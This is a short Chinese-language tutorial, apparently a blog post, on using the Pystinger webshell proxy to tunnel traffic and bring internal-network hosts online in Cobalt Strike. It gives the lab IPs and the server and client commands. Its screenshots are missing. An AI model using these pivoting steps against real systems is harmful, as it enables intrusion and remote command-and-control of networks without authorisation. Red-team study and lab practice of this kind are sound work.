Pystinger实现内网主机CS上线

N 人看过

一、Pystinger简介

          毒刺(pystinger)通过webshell实现内网SOCK4代理,端口映射。可直接用于metasploit-framework,viper,cobalt strike上线,主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本。
repo:https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md

二、简化分析

  • 在这里插入图片描述

三、操作演示

          

1. 测试环境:

  1. 攻击机Cobaltstrike <==> 192.168.1.12
    1. Web站点 abc.com  <==> 192.168.1.10
    2. Web站点内网主机A<==> 192.168.1.5

2. 单台主机上线

  1. 上传proxy文件,保证正常访问。

    在这里插入图片描述
    根据站点解析的语言自行选择对应的proxy文件。
    在这里插入图片描述

  2. 目标站点执行命令 start stinger_server.exe
    在这里插入图片描述

  3. 攻击机:
    ./stinger_client -w http://192.168.1.10/asdfbgnbvcsZvxbcxzseqewfrqegnjr.php -l 0.0.0.0 -p 60000
    在这里插入图片描述
    RAT Config 配置: 设置listener为127.0.0.1:60020,payload连接的是127.0.0.1:60020,相当于通过proxy.php将web站点的60020端口映射到攻击机本地的60020端口。

  4. CS配置
    在这里插入图片描述
    生成payload运行即可上线。
    在这里插入图片描述

3. 多台主机上线

  1. Web站点执行:start stinger_server.exe 0.0.0.0
    在这里插入图片描述

  2. 修改监听器重新生成payload并在A主机执行,其余执行命令不变,最后成功上线。
    在这里插入图片描述
    在这里插入图片描述

本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 (CC BY-NC-ND 4.0) 进行许可。